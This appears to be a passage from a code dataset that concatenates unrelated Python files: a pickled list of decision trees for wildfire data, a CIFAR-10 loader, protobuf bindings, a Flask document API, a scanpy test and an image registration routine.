'Kitsap', ['Leaf', 3.0, 0, 2]]]}, {'accuracy': 0.34375, 'tree': ['Attribute', 'att1', ['Value', 'Klickitat', ['Leaf', 2.0, 0, 150]], ['Value', 'Ferry', ['Leaf', 3.0, 0, 66]], ['Value', 'Okanogan', ['Leaf', 3.0, 0, 341]], ['Value', 'Clallam', ['Leaf', 3.0, 0, 53]], ['Value', 'Lewis', ['Leaf', 3.0, 0, 105]], ['Value', 'Kittitas', ['Leaf', 3.0, 0, 115]], ['Value', 'Spokane', ['Attribute', 'att2', ['Value', 'Recreation', ['Leaf', 2.0, 0, 31]], ['Value', 'Arson', ['Leaf', 2.0, 0, 37]], ['Value', 'Lightning', ['Leaf', 3.0, 0, 25]], ['Value', 'Miscellaneou', ['Leaf', 3.0, 0, 122]], ['Value', 'Logging', ['Leaf', 3.0, 1, 318]], ['Value', 'Under Invest', ['Leaf', 5.0, 4, 318]], ['Value', 'Debris Burn', ['Leaf', 3.0, 0, 51]], ['Value', 'Railroad', ['Leaf', 2.0, 0, 25]], ['Value', 'Children', ['Leaf', 4.0, 0, 12]], ['Value', 'Undetermined', ['Leaf', 5.0, 0, 5]], ['Value', 'Smoker', ['Leaf', 6.0, 0, 4]], ['Value', 'None', ['Leaf', 3.0, 1, 318]]]], ['Value', 'Chelan', ['Leaf', 3.0, 0, 142]], ['Value', 'Mason', ['Leaf', 3.0, 0, 69]], ['Value', 'Lincoln', ['Leaf', 3.0, 0, 79]], ['Value', 'Yakima', ['Leaf', 3.0, 0, 82]], ['Value', 'Jefferson', ['Leaf', 3.0, 0, 32]], ['Value', 'Pend Oreille', ['Leaf', 2.0, 0, 61]], ['Value', 'Stevens', ['Attribute', 'att2', ['Value', 'Recreation', ['Leaf', 2.0, 0, 15]], ['Value', 'Arson', ['Leaf', 2.0, 0, 11]], ['Value', 'Lightning', ['Leaf', 3.0, 0, 33]], ['Value', 'Miscellaneou', ['Leaf', 3.0, 0, 84]], ['Value', 'Logging', ['Leaf', 3.0, 4, 290]], ['Value', 'Under Invest', ['Leaf', 5.0, 0, 4]], ['Value', 'Debris Burn', ['Leaf', 2.0, 0, 117]], ['Value', 'Railroad', ['Leaf', 2.0, 0, 6]], ['Value', 'Children', ['Leaf', 2.0, 0, 4]], ['Value', 'Undetermined', ['Leaf', 9.0, 1, 290]], ['Value', 'Smoker', ['Leaf', 2.0, 0, 10]], ['Value', 'None', ['Leaf', 5.0, 1, 290]]]], ['Value', 'Cowlitz', ['Leaf', 3.0, 0, 77]], ['Value', 'Pierce', ['Leaf', 3.0, 0, 58]], ['Value', 'King', ['Leaf', 2.0, 0, 23]], ['Value', 'Walla Walla', ['Leaf', 3.0, 0, 24]], ['Value', 'Douglas', ['Leaf', 6.0, 0, 17]], ['Value', 'Island', ['Leaf', 3.0, 0, 9]], ['Value', 'Skamania', ['Leaf', 3.0, 0, 27]], ['Value', 'Thurston', ['Leaf', 2.0, 0, 52]], ['Value', 'Columbia', ['Leaf', 3.0, 0, 15]], ['Value', 'Snohomish', ['Leaf', 3.0, 0, 36]], ['Value', 'Skagit', ['Leaf', 3.0, 0, 47]], ['Value', 'Pacific', ['Leaf', 3.0, 0, 36]], ['Value', 'Grays Harbor', ['Leaf', 2.0, 0, 56]], ['Value', 'Whatcom', ['Leaf', 3.0, 0, 37]], ['Value', 'Clark', ['Leaf', 3.0, 0, 30]], ['Value', 'Kitsap', ['Leaf', 3.0, 2, 2503]], ['Value', 'San Juan', ['Leaf', 3.0, 0, 9]], ['Value', 'Asotin', ['Leaf', 4.0, 0, 20]], ['Value', 'Garfield', ['Leaf', 3.0, 0, 7]], ['Value', 'Adams', ['Leaf', 5.0, 2, 2503]], ['Value', 'Wahkiakum', ['Leaf', 2.0, 0, 7]], ['Value', 'Whitman', ['Leaf', 5.0, 0, 5]], ['Value', 'Grant', ['Leaf', 5.0, 1, 2503]], ['Value', 'No Data', ['Leaf', 4.0, 0, 2]], ['Value', 'Benton', ['Leaf', 7.0, 1, 2503]]]}, {'accuracy': 0.33568904593639576, 'tree': ['Attribute', 'att1', ['Value', 'Stevens', ['Attribute', 'att2', ['Value', 'Recreation', ['Leaf', 2.0, 0, 24]], ['Value', 'Debris Burn', ['Leaf', 2.0, 0, 105]], ['Value', 'Children', ['Leaf', 3.0, 0, 4]], ['Value', 'Miscellaneou', ['Leaf', 3.0, 0, 80]], ['Value', 'Railroad', ['Leaf', 2.0, 0, 6]], ['Value', 'Undetermined', ['Leaf', 9.0, 3, 300]], ['Value', 'Logging', ['Leaf', 3.0, 0, 9]], ['Value', 'Lightning', ['Leaf', 2.0, 0, 39]], ['Value', 'Smoker', ['Leaf', 2.0, 0, 8]], ['Value', 'None', ['Leaf', 5.0, 2, 300]], ['Value', 'Arson', ['Leaf', 3.0, 0, 15]], ['Value', 'Under Invest', ['Leaf', 3.0, 0, 5]]]], ['Value', 'Grays Harbor', ['Leaf', 2.0, 0, 49]], ['Value', 'Chelan', ['Leaf', 3.0, 0, 143]], ['Value', 'Okanogan', ['Leaf', 3.0, 0, 306]], ['Value', 'Spokane', ['Attribute', 'att2', ['Value', 'Recreation', ['Leaf', 2.0, 0, 27]], ['Value', 'Debris Burn', ['Leaf', 3.0, 0, 66]], ['Value', 'Children', ['Leaf', 2.0, 0, 10]], ['Value', 'Miscellaneou', ['Leaf', 3.0, 0, 152]], ['Value', 'Railroad', ['Leaf', 2.0, 0, 21]], ['Value', 'Undetermined', ['Leaf', 5.0, 0, 8]], ['Value', 'Logging', ['Leaf', 2.0, 0, 2]], ['Value', 'Lightning', ['Leaf', 3.0, 0, 25]], ['Value', 'Smoker', ['Leaf', 3.0, 0, 3]], ['Value', 'None', ['Leaf', 2.0, 0, 5]], ['Value', 'Arson', ['Leaf', 2.0, 0, 24]], ['Value', 'Under Invest', ['Leaf', 5.0, 2, 345]]]], ['Value', 'Cowlitz', ['Leaf', 3.0, 0, 74]], ['Value', 'Lincoln', ['Leaf', 3.0, 0, 66]], ['Value', 'Kittitas', ['Leaf', 3.0, 0, 122]], ['Value', 'Pacific', ['Leaf', 3.0, 0, 61]], ['Value', 'Skagit', ['Leaf', 3.0, 0, 57]], ['Value', 'Lewis', ['Leaf', 3.0, 0, 111]], ['Value', 'Island', ['Leaf', 3.0, 0, 8]], ['Value', 'Klickitat', ['Leaf', 2.0, 0, 193]], ['Value', 'Walla Walla', ['Leaf', 4.0, 0, 19]], ['Value', 'Jefferson', ['Leaf', 3.0, 0, 23]], ['Value', 'Garfield', ['Leaf', 7.0, 0, 6]], ['Value', 'Thurston', ['Leaf', 2.0, 0, 50]], ['Value', 'King', ['Leaf', 3.0, 0, 33]], ['Value', 'Douglas', ['Leaf', 6.0, 0, 28]], ['Value', 'Yakima', ['Leaf', 3.0, 0, 90]], ['Value', 'Mason', ['Leaf', 3.0, 0, 55]], ['Value', 'Snohomish', ['Leaf', 3.0, 0, 27]], ['Value', 'Pierce', ['Leaf', 3.0, 0, 44]], ['Value', 'Kitsap', ['Leaf', 3.0, 0, 6]], ['Value', 'Clark', ['Leaf', 3.0, 0, 18]], ['Value', 'Columbia', ['Leaf', 3.0, 0, 17]], ['Value', 'Pend Oreille', ['Leaf', 3.0, 0, 45]], ['Value', 'Skamania', ['Leaf', 3.0, 0, 27]], ['Value', 'Asotin', ['Leaf', 7.0, 0, 17]], ['Value', 'Whatcom', ['Leaf', 3.0, 0, 39]], ['Value', 'Ferry', ['Leaf', 3.0, 0, 72]], ['Value', 'Wahkiakum', ['Leaf', 3.0, 1, 2503]], ['Value', 'Clallam', ['Leaf', 3.0, 0, 38]], ['Value', 'Adams', ['Leaf', 5.0, 3, 2503]], ['Value', 'San Juan', ['Leaf', 2.0, 0, 3]], ['Value', 'Grant', ['Leaf', 6.0, 1, 2503]], ['Value', 'No Data', ['Leaf', 4.0, 0, 2]], ['Value', 'Whitman', ['Leaf', 5.0, 0, 4]]]}, {'accuracy': 0.33390705679862304, 'tree': ['Attribute', 'att1', ['Value', 'Spokane', ['Leaf', 3.0, 0, 364]], ['Value', 'Stevens', ['Leaf', 2.0, 0, 298]], ['Value', 'Klickitat', ['Leaf', 3.0, 0, 165]], ['Value', 'Okanogan', ['Leaf', 3.0, 0, 340]], ['Value', 'Yakima', ['Leaf', 5.0, 0, 88]], ['Value', 'Chelan', ['Leaf', 3.0, 0, 110]], ['Value', 'Cowlitz', ['Leaf', 3.0, 0, 84]], ['Value', 'Thurston', ['Leaf', 2.0, 0, 78]], ['Value', 'Pend Oreille', ['Leaf', 2.0, 0, 46]], ['Value', 'Pierce', ['Leaf', 3.0, 0, 45]], ['Value', 'Mason', ['Leaf', 3.0, 0, 69]], ['Value', 'Grays Harbor', ['Leaf', 2.0, 0, 58]], ['Value', 'Douglas', ['Leaf', 6.0, 0, 33]], ['Value', 'Ferry', ['Leaf', 3.0, 0, 77]], ['Value', 'Skagit', ['Leaf', 3.0, 0, 39]], ['Value', 'Clark', ['Leaf', 2.0, 0, 28]], ['Value', 'Kittitas', ['Leaf', 3.0, 0, 108]], ['Value', 'Lewis', ['Leaf', 3.0, 0, 106]], ['Value', 'Skamania', ['Leaf', 3.0, 0, 25]], ['Value', 'King', ['Leaf', 3.0, 0, 23]], ['Value', 'Asotin', ['Leaf', 3.0, 0, 24]], ['Value', 'Snohomish', ['Leaf', 3.0, 0, 26]], ['Value', 'Pacific', ['Leaf', 2.0, 0, 36]], ['Value', 'Jefferson', ['Leaf', 3.0, 0, 29]], ['Value', 'Clallam', ['Leaf', 3.0, 0, 44]], ['Value', 'Lincoln', ['Leaf', 3.0, 0, 56]], ['Value', 'Walla Walla', ['Leaf', 3.0, 0, 18]], ['Value', 'Island', ['Leaf', 3.0, 6, 2503]], ['Value', 'Whatcom', ['Leaf', 3.0, 0, 26]], ['Value', 'Benton', ['Leaf', 7.0, 1, 2503]], ['Value', 'Kitsap', ['Leaf', 3.0, 0, 8]], ['Value', 'San Juan', ['Leaf', 2.0, 0, 14]], ['Value', 'Columbia', ['Leaf', 3.0, 0, 16]], ['Value', 'Franklin', ['Leaf', 5.0, 1, 2503]], ['Value', 'Grant', ['Leaf', 5.0, 4, 2503]], ['Value', 'Garfield', ['Leaf', 3.0, 0, 5]], ['Value', 'Whitman', ['Leaf', 7.0, 2, 2503]], ['Value', 'Wahkiakum', ['Leaf', 2.0, 1, 2503]], ['Value', 'No Data', ['Leaf', 3.0, 1, 2503]], ['Value', 'Adams', ['Leaf', 5.0, 1, 2503]]]}]
packaged_object = best_trees
# pickle packaged_object
outfile = open("trees.p", "wb")
pickle.dump(packaged_object, outfile)
outfile.close() | 10,892 | 5,703 |
import json
#Parse csv to kdb.json
with open("kdb.csv", "r", encoding="utf_8") as f:
l=[]
lines = f.readlines()
# remove the header
lines.pop(0)
for line in lines:
tmp1 = line.split('"')
if tmp1[15] == "":
tmp1[15] = " "
if not "" in set([tmp1[1], tmp1[3], tmp1[11], tmp1[13], tmp1[15], tmp1[21]]):
l.append([tmp1[1], tmp1[3], tmp1[11], tmp1[13], tmp1[15], tmp1[21]])
json_data = {}
l.pop(0)
for i in l:
json_data[i[0]] = i[1:]
enc = json.dumps(json_data,ensure_ascii=False)
with open("kdb.json", "w") as f:
f.write(enc)
print("complete")
| 624 | 276 |
import os
import shutil
import tarfile
import urllib.request
import pandas as pd
CIFAR10_URL = 'https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz'
class CIFAR_10:
def __init__(self, path, download=True, train=True):
self.path = path
self.download = download
self.train = train
self.csv_list = []
if self.download:
self._Download()
self.path = os.getcwd() + '/' + self.path
self.toCSV()
self.TrainFile = self.path + '/' + 'cifar-10-batches-py/train_cifar.csv'
self.TestFile = self.path + '/' + 'cifar-10-batches-py/test_batch.csv'
def _Download(self):
if not os.path.exists(os.getcwd() + '/' + self.path):
os.mkdir(self.path)
file_name = 'CIFAR-10.tar.gz'
with urllib.request.urlopen(CIFAR10_URL) as response, open(os.getcwd() + '/' + self.path + '/' + file_name,
'wb') as out_file:
shutil.copyfileobj(response, out_file)
tar = tarfile.open(os.getcwd() + '/' + self.path + '/' + file_name, "r:gz")
tar.extractall(os.getcwd() + '/' + self.path + '/')
tar.close()
def unpickle(self, file):
import pickle
with open(file, 'rb') as fo:
dict = pickle.load(fo, encoding='bytes')
return dict
def toCSV(self):
file_names = ['data_batch_1', 'data_batch_2', 'data_batch_3', 'data_batch_4', 'data_batch_5', 'test_batch']
for name in file_names:
df_labels = pd.DataFrame(self.unpickle(self.path + '/' + 'cifar-10-batches-py/' + name)[b'labels'])
df_data = pd.DataFrame(self.unpickle(self.path + '/' + 'cifar-10-batches-py/' + name)[b'data'])
new = pd.concat([df_labels, df_data], axis=1)
if not os.path.exists(self.path + '/' + 'cifar-10-batches-py/' + name + '.csv'):
new.to_csv(self.path + '/' + 'cifar-10-batches-py/' + name + '.csv', index=False)
for name in file_names[0:5]:
self.csv_list.append(self.path + '/' + 'cifar-10-batches-py/' + name + '.csv')
if not os.path.exists(self.path + '/' + 'cifar-10-batches-py/train_cifar.csv'):
df_from_each_file = (pd.read_csv(f, sep=',', header=None) for f in self.csv_list)
df_merged = pd.concat(df_from_each_file, ignore_index=True)
df_merged.to_csv(self.path + '/' + 'cifar-10-batches-py/train_cifar.csv', index=False)
def __repr__(self):
return self.TrainFile if self.train == True else self.TestFile
| 2,600 | 952 |
def printer(n,k,order):
lst = [(order[x],False if x==k else True) for x in range(len(order))]
flag, i = True, 0
while flag:
if lst[0][0] == max(lst,key=lambda x:x[0])[0]:
flag = lst.pop(0)[1]
i +=1
else:
lst.append(lst.pop(0))
print(i)
for _ in range(int(input())):
n,k=map(int,input().split())
lst=list(map(int,input().split()))
printer(n,k,lst) | 367 | 175 |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: commands/v1/oracles.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='commands/v1/oracles.proto',
package='vega.commands.v1',
syntax='proto3',
serialized_options=b'\n io.vegaprotocol.vega.commands.v1Z+code.vegaprotocol.io/vega/proto/commands/v1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x19\x63ommands/v1/oracles.proto\x12\x10vega.commands.v1\"\xcb\x01\n\x14OracleDataSubmission\x12K\n\x06source\x18\x01 \x01(\x0e\x32\x33.vega.commands.v1.OracleDataSubmission.OracleSourceR\x06source\x12\x18\n\x07payload\x18\x02 \x01(\x0cR\x07payload\"L\n\x0cOracleSource\x12\x1d\n\x19ORACLE_SOURCE_UNSPECIFIED\x10\x00\x12\x1d\n\x19ORACLE_SOURCE_OPEN_ORACLE\x10\x01\x42O\n io.vegaprotocol.vega.commands.v1Z+code.vegaprotocol.io/vega/proto/commands/v1b\x06proto3'
)
_ORACLEDATASUBMISSION_ORACLESOURCE = _descriptor.EnumDescriptor(
name='OracleSource',
full_name='vega.commands.v1.OracleDataSubmission.OracleSource',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='ORACLE_SOURCE_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ORACLE_SOURCE_OPEN_ORACLE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=175,
serialized_end=251,
)
_sym_db.RegisterEnumDescriptor(_ORACLEDATASUBMISSION_ORACLESOURCE)
_ORACLEDATASUBMISSION = _descriptor.Descriptor(
name='OracleDataSubmission',
full_name='vega.commands.v1.OracleDataSubmission',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='source', full_name='vega.commands.v1.OracleDataSubmission.source', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='source', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='payload', full_name='vega.commands.v1.OracleDataSubmission.payload', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='payload', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_ORACLEDATASUBMISSION_ORACLESOURCE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=48,
serialized_end=251,
)
_ORACLEDATASUBMISSION.fields_by_name['source'].enum_type = _ORACLEDATASUBMISSION_ORACLESOURCE
_ORACLEDATASUBMISSION_ORACLESOURCE.containing_type = _ORACLEDATASUBMISSION
DESCRIPTOR.message_types_by_name['OracleDataSubmission'] = _ORACLEDATASUBMISSION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
OracleDataSubmission = _reflection.GeneratedProtocolMessageType('OracleDataSubmission', (_message.Message,), {
'DESCRIPTOR' : _ORACLEDATASUBMISSION,
'__module__' : 'commands.v1.oracles_pb2'
# @@protoc_insertion_point(class_scope:vega.commands.v1.OracleDataSubmission)
})
_sym_db.RegisterMessage(OracleDataSubmission)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 4,119 | 1,588 |
import os
parameter_tuning_options = {
"experiment_name": "non-regression-tests",
# Tuning method alternatives:
# - "optimization": use bayesian optimisation
# - "grid_search"
"tuning_method": "grid_search",
# Additionnal options for the grid search method
"use_cache": False,
# Additionnal options for the optimization method
"optimization_ncalls": 10,
}
parameters_fquad = {
"k_retriever": [5],
"k_title_retriever" : [1], # must be present, but only used when retriever_type == title_bm25
"k_reader_per_candidate": [20],
"k_reader_total": [10],
"reader_model_version": ["053b085d851196110d7a83d8e0f077d0a18470be"],
"retriever_model_version": ["1a01b38498875d45f69b2a6721bf6fe87425da39"],
"dpr_model_version": ["v1.0"],
"retriever_type": ["bm25"], # Can be bm25, sbert, dpr, title or title_bm25
"squad_dataset": [
os.getenv("DATA_DIR") + "/non-regression-tests/fquad_dataset.json"
],
"filter_level": [None],
"preprocessing": [False],
"boosting" : [1], #default to 1
"split_by": ["word"], # Can be "word", "sentence", or "passage"
"split_length": [1000],
}
# A dictionnary specifying the criteria a test result must pass. Keys are
# metrics names and keys are predicates on the corresponding metric which must
# return true if the value is satisfying.
pass_criteria_fquad = {
"reader_topk_accuracy_has_answer":
# metric ~= 0.747 +/- 1%
lambda metric: abs(metric / 0.747 - 1) < 0.01
}
parameters_dila = {
"k_retriever": [1],
"k_title_retriever" : [1], # must be present, but only used when retriever_type == title_bm25
"k_reader_per_candidate": [20],
"k_reader_total": [10],
"reader_model_version": ["053b085d851196110d7a83d8e0f077d0a18470be"],
"retriever_model_version": ["1a01b38498875d45f69b2a6721bf6fe87425da39"],
"dpr_model_version": ["v1.0"],
"retriever_type": ["bm25"], # Can be bm25, sbert, dpr, title or title_bm25
"squad_dataset": [
os.getenv("SRC_DIR") + "/piaf-ml/clients/dila/knowledge_base/squad.json"],
"filter_level": [None],
"preprocessing": [False],
"boosting" : [1], #default to 1
"split_by": ["word"], # Can be "word", "sentence", or "passage"
"split_length": [1000],
}
# A dictionnary specifying the criteria a test result must pass. Keys are
# metrics names and keys are predicates on the corresponding metric which must
# return true if the value is satisfying.
pass_criteria_dila = {
"reader_topk_accuracy_has_answer":
# metric ~= 0.427 +/- 1%
lambda metric: abs(metric / 0.427 - 1) < 0.01
}
tests = [
(parameters_fquad, parameter_tuning_options, pass_criteria_fquad),
(parameters_dila, parameter_tuning_options, pass_criteria_dila),
]
| 2,788 | 1,122 |
import networkx as nx
from misc import maximum_matching_all
from networkx import get_node_attributes
def is_tree_based(graph):
if is_binary(graph):
# print("Graph is not binary! Zhang's won't work!")
return None
unmatched_reticulation = zhang_graph(graph)
if len(unmatched_reticulation) == 0:
return True
else:
return False
def is_binary(graph):
for node in graph.nodes():
if graph.out_degree(node) > 2 or graph.in_degree(node) > 2:
return False
return True
# Use this for non-binary graph
def zhang_graph(graph):
try:
zhang = zhang_bipartite(graph)
max_match = maximum_matching_all(zhang)
reticulations = [n for n, d in zhang.nodes(data=True) if d['biparite'] == 0]
data = get_node_attributes(zhang, 'biparite')
matched_reticulations = set()
for s, t in max_match.items():
try:
if data[s] == 1:
matched_reticulations.add(s)
if data[t] == 1:
matched_reticulations.add(t)
except KeyError:
continue
except nx.exception.NetworkXPointlessConcept:
return list()
set_minus = set(reticulations) - matched_reticulations
return list(set_minus)
def zhang_bipartite(graph):
zhang = nx.Graph()
for node in graph.nodes():
# This is a reticulation vertex
if graph.in_degree(node) == 2 and graph.out_degree(node) == 1:
zhang.add_node(node, bipartite=0)
# BE CAREFUL NOT TO ADD RETICULATIONS AGAIN ON OTHER SIDE!
for parent in graph.predecessors(node):
if graph.in_degree(parent) == 1 and graph.out_degree(parent) == 2:
zhang.add_node(parent, bipartite=1)
for e in graph.edges(parent):
# Add the edge only if we know the child is a reticulation
if graph.in_degree(e[1]) == 2 and graph.out_degree(e[1]) == 1:
zhang.add_edge(node, parent)
return zhang
| 2,101 | 675 |
__all__ = ["BaseIdCardAuthenticationView", "IdCardSigner"]
from .signer import IdCardSigner
from .views import BaseIdCardAuthenticationView
| 141 | 40 |
from arcade import Sprite
class PlaceableInterface:
def place(self, *args):
pass
| 101 | 36 |
"""RESTful API Document resource."""
from flask_restx import Resource, reqparse
from flask_restx._http import HTTPStatus
from werkzeug.datastructures import FileStorage
from ..service.document_service import (
delete_document,
edit_document,
get_all_documents,
get_document,
save_document,
)
from .dto import DocumentDTO
api = DocumentDTO.document_api
_document = DocumentDTO.document
parser = reqparse.RequestParser()
parser.add_argument("document_name", type=str, help="Document name", location="form")
parser.add_argument("file", type=FileStorage, location="files")
@api.route("/")
class DocumentList(Resource):
@api.doc("list of documents")
@api.marshal_list_with(_document, envelope="data")
def get(self):
"""List all documents."""
return get_all_documents()
@api.doc("Create a new Document")
@api.expect(parser, validate=True)
@api.response(HTTPStatus.CREATED, "Document successfully saved")
@api.response(HTTPStatus.NOT_FOUND, "File not found")
@api.response(HTTPStatus.BAD_REQUEST, "File empty")
@api.response(HTTPStatus.NOT_ACCEPTABLE, "File extension not allowed")
@api.response(HTTPStatus.REQUEST_ENTITY_TOO_LARGE, "File exceeds max upload size")
def post(self):
"""Create a new Document."""
parse_data = parser.parse_args()
document_name = parse_data["document_name"]
file = parse_data["file"]
if not file or not document_name:
self.api.abort(
code=HTTPStatus.NOT_FOUND,
message="File not found or document name empty",
)
else:
return save_document(document_name, file)
@api.route("/<int:doc_id>")
@api.param("doc_id", "The ID of the docuemnt to process")
@api.response(HTTPStatus.NOT_FOUND, "Document not found")
@api.response(HTTPStatus.NOT_ACCEPTABLE, "File and document name empty")
class DocumentByID(Resource):
@api.doc("Get a single document")
@api.marshal_with(_document)
def get(self, doc_id):
"""Retrieve a document."""
document = get_document(doc_id)
if not document:
self.api.abort(code=HTTPStatus.NOT_FOUND, message="Document not found")
else:
return document
@api.doc("Patch a document")
@api.expect(parser)
def patch(self, doc_id):
"""Patch a document."""
document = get_document(doc_id)
if not document:
self.api.abort(code=HTTPStatus.NOT_FOUND, message="Document not found")
else:
parse_data = parser.parse_args()
document_name = parse_data["document_name"]
file = parse_data["file"]
if not file and not document_name:
self.api.abort(HTTPStatus.NOT_ACCEPTABLE, message="Both inputs empty")
else:
return edit_document(document, document_name, file)
# return self.get(doc_id)
@api.doc("Delete a document")
@api.response(HTTPStatus.BAD_REQUEST, "Can't delete document")
def delete(self, doc_id):
"""Delete a document."""
document = get_document(doc_id)
if not document:
self.api.abort(code=HTTPStatus.NOT_FOUND, message="Document not found")
else:
return delete_document(document)
# @api.route("/smes/<sme_id>")
# @api.param("sme_id", "The SME id")
# @api.response(HTTPStatus.NOT_FOUND, "SME not found")
# class DocumentSME(Resource):
# @api.doc("List all documents of an SME")
# @api.marshal_list_with(_document, envelope="data")
# def get(self, sme_id):
# """List all documents of an SME."""
# if not get_sme_by_id(sme_id):
# api.abort(404)
# return get_all_sme_documents(sme_id)
| 3,765 | 1,161 |
#!/usr/bin/env python
# encoding: utf-8
col_shortener = {
'Q1':'confirm',
'Q2':'faculty',
'Q3':'department',
'Q4':'funders',
'Q5':'position',
'Q6':'use_software',
'Q7':'importance_software',
'Q8':'develop_own_code',
'Q9':'development_expertise',
'Q10':'sufficient_training',
'Q11':'want_to_commercialise',
'Q12':'ready_to_release',
'Q13':'hpc_use',
'Q14_1':'version_control',
'Q14_2':'unit_regression_testing',
'Q14_3':'continuous_integration',
'Q14_4':'compilation',
'Q14_5':'documentation',
'Q15':'uni_support',
'Q16':'hired_developer',
'Q17':'costed_developer',
'Q18_1':'hire_full_time_developer',
'Q18_2':'hire_pool_developer',
'Q19':'voucher',
'Q20':'consulting',
'Q21':'mailing'
}
add_an_other_category = [
'funders',
'position',
'hpc_use'
]
sort_no_further_analysis = [
'faculty',
'funders',
'position',
'hpc_use'
]
yes_no_analysis = [
'use_software',
'develop_own_code',
'sufficient_training',
'want_to_commercialise',
'ready_to_release',
'hired_developer'
]
scale_analysis = [
'importance_software',
'development_expertise',
'sufficient_training'
]
worded_scale_analysis = [
'version_control',
'continuous_integration',
'unit_regression_testing',
'hire_full_time_developer',
'hire_pool_developer'
]
| 1,405 | 563 |
import pytest
import numpy as np
from anndata import AnnData
from scipy.sparse import csr_matrix
import scanpy as sc
# test "data" for 3 cells * 4 genes
X = [
[-1, 2, 0, 0],
[1, 2, 4, 0],
[0, 2, 2, 0],
] # with gene std 1,0,2,0 and center 0,2,2,0
X_scaled = [
[-1, 2, 0, 0],
[1, 2, 2, 0],
[0, 2, 1, 0],
] # with gene std 1,0,1,0 and center 0,2,1,0
X_centered = [
[-1, 0, -1, 0],
[1, 0, 1, 0],
[0, 0, 0, 0],
] # with gene std 1,0,1,0 and center 0,0,0,0
@pytest.mark.parametrize('typ', [np.array, csr_matrix], ids=lambda x: x.__name__)
@pytest.mark.parametrize('dtype', ['float32', 'int64'])
def test_scale(typ, dtype):
# test AnnData arguments
# test scaling with default zero_center == True
adata0 = AnnData(typ(X), dtype=dtype)
sc.pp.scale(adata0)
assert np.allclose(csr_matrix(adata0.X).toarray(), X_centered)
# test scaling with explicit zero_center == True
adata1 = AnnData(typ(X), dtype=dtype)
sc.pp.scale(adata1, zero_center=True)
assert np.allclose(csr_matrix(adata1.X).toarray(), X_centered)
# test scaling with explicit zero_center == False
adata2 = AnnData(typ(X), dtype=dtype)
sc.pp.scale(adata2, zero_center=False)
assert np.allclose(csr_matrix(adata2.X).toarray(), X_scaled)
# test bare count arguments, for simplicity only with explicit copy=True
# test scaling with default zero_center == True
data0 = typ(X, dtype=dtype)
cdata0 = sc.pp.scale(data0, copy=True)
assert np.allclose(csr_matrix(cdata0).toarray(), X_centered)
# test scaling with explicit zero_center == True
data1 = typ(X, dtype=dtype)
cdata1 = sc.pp.scale(data1, zero_center=True, copy=True)
assert np.allclose(csr_matrix(cdata1).toarray(), X_centered)
# test scaling with explicit zero_center == False
data2 = typ(X, dtype=dtype)
cdata2 = sc.pp.scale(data2, zero_center=False, copy=True)
assert np.allclose(csr_matrix(cdata2).toarray(), X_scaled)
| 1,974 | 801 |
import cv2
import numpy as np
import bilinear
import patchreg
from skimage.util import view_as_windows
def bilinear_interpolation_of_patch_registration(master_srcdata, target_srcdata):
print("Beginning bilinear_interpolation_of_patch_registration...")
w_shape = (1000, 1000, 4) # window_size
w_step = (500, 500, 4) # 步长
padding = w_step[0] # must do step padding
master_data = cv2.copyMakeBorder(master_srcdata, padding, padding, padding, padding, cv2.BORDER_REFLECT)
target_data = cv2.copyMakeBorder(target_srcdata, padding, padding, padding, padding, cv2.BORDER_REFLECT)
master_img = cv2.cvtColor(master_data, code=cv2.COLOR_BGRA2RGBA)
target_img = cv2.cvtColor(target_data, code=cv2.COLOR_BGRA2RGBA)
# Stage One: Low-precision feature alignment
h, _ = patchreg.alignFeatures(target_img, master_img)
height, width = target_img.shape[:2]
master_aligned = cv2.warpPerspective(master_img, h, (width, height))
# Stage Two: Calculate patch-level registrations
stack1 = np.concatenate((target_img, master_aligned), axis=-1) # (2000, 40000, 8)
patches = view_as_windows(stack1, window_shape=w_shape, step=w_step)
morphs = patchreg.calcPlateMorphs(patches) # (3,7,2,3,3)
# Stage Three: Compute patch-level DVFs=dense displacement vector field
id_patches = patchreg.calc_id_patches(img_shape=master_aligned.shape, patch_size=1000) # (3,7,3,2000,2000,1)
map_morphs = np.append(morphs, morphs[:, :, 1, None], axis=2) # (3,7,3,3,3)
reg_patches_src = patchreg.applyMorphs(id_patches, map_morphs) # (3,7,3,2000,2000,1)
map_patches = reg_patches_src[:, :, 1:, 500:1500, 500:1500, :]
# Stage Four: Merge patch-level DVFs into a single global transform.
quilts = bilinear.quilter(map_patches)
wquilts = bilinear.bilinear_wquilts(map_patches)
qmaps = [q * w for q, w in zip(quilts, wquilts)] # 对应位置的元素相乘
qmaps_sum = qmaps[0] + qmaps[1] + qmaps[2] + qmaps[3]
summed = (qmaps_sum).reshape(qmaps_sum.shape[:-1]).astype(np.float32)
master_remap = cv2.remap(master_img, summed[0], summed[1], interpolation=cv2.INTER_LINEAR) # summed 是坐标映射关系
master_reg = master_remap[padding:height-padding, padding:width-padding, :]
return master_reg
def draw_img():
master_srcdata = cv2.imread("../data/OK1_1_32.jpg")
padding = 500
